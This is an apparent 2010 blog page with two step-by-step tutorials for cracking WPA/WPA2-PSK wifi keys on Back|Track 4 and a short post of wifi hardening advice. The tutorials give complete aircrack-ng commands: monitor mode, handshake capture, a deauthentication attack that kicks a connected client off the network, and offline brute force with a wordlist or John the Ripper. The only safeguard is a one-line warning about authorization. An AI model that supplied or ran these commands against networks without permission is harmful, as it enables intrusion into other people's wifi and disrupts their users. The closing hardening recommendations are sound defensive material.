Friday, April 16, 2010

HOWTO : Crack WPA/WPA2-PSK with dictionary

At the moment, we need to use dictionaries to brute force the WPA/WPA-PSK. To crack WPA/WPA2-PSK requires the to be cracked key is in your dictionaries.

The following tutorial is based on Back|Track 4.

Suppose the wifi channel is 5, the BSSID MAC is 00:24:B2:A0:51:14 and the client MAC is 00:14:17:94:90:0D. Make sure the client is connecting to the wifi router when you are performing Step 1 to 4.

Step 1 :
apt-get install wpa-wordlist

Step 2 :
airmon-ng start wlan0

Step 3 :
airodump-ng mon0

Step 4 :
airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0

Step 5:
aireplay-ng --deauth 10 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0

To get the handshake when done and then go to next step. If not, do it again until you get the handshake.

Step 6 :
aircrack-ng output-01.cap -w /pentest/password/wordlist/wpa.txt

Good luck!

WARNING : Do NOT crack any wifi router without authorization or you may be put into jail.

That's all. See you!

HOWTO : Crack WPA/WPA2-PSK with John the Ripper

At the moment, we need to use dictionaries to brute force the WPA/WPA-PSK. To crack WPA/WPA2-PSK requires the to be cracked key is in your dictionaries.

I have a better solution to crack WPA/WPA2-PSK (in theory, it must success) but it requires hours to years to crack depending on the strength of the key and the speed of the hardwares. The following tutorial is based on Back|Track 4.

Suppose the wifi channel is 5, the BSSID MAC is 00:24:B2:A0:51:14 and the client MAC is 00:14:17:94:90:0D. Make sure the client is connecting to the wifi router when you are performing Step 1 to 4.

Step 1 :
airmon-ng start wlan0

Step 2 :
airodump-ng mon0

Step 3 :
airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0

Step 4 :
aireplay-ng --deauth 10 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0

To get the handshake when done and then go to next step. If not, do it again until you get the handshake.

Step 5 :
/pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:24:B2:A0:51:14 -w - output*.cap

You are required to wait for hours or years for the cracking which is depends on how powerful your hardwares are and strength of the key. CUDA will make the work more easier but it may also need years or so just depends.

WARNING : Do NOT crack any wifi router without authorization or you will be put into jail.

That's all. See you!

Tuesday, April 06, 2010

Wifi is not 100% safe

There are several protections for wifi, they are WEP, WPA and WP2. WEP can be cracked easily. WPA and WP2 are also not safe recently no matter you are using AES or TKIP encryptions for your PSK. However, at least one client is connecting to the wifi router and your WPA/WPA2 key is in the dictionary (password list) of the cracker so as the cracker can crack WPA/WPA2-PSK.

Recommendation

(1) at least use WPA2-Personal with AES encryption for the key (most likely for home users) or use Captive Portal if any;
(2) keep your WPA/WPA2 key as long (the longest is 63 characters) and complicated as possible, it should includes capital and small letters, symbols and numbers (however, some devices may not recognize such length of the key);
(3) enable MAC address filter (if possible; but not quiet useful for higher security);
(4) do not use factory's WPS feature (or similar, e.g. QSS) as it is quiet danger for users but convenience for crackers;
(5) change your WPA/WPA2 key often; and
(6) use WPA2-Enterprise if possible (it is the highest security so far).

Be keep in mind that this settings may not be worked tomorrow. The world is changing very fast.

By the way, hidden BSSID and MAC address filter are useless as crackers can obtain such information very easy.

That's all! See you.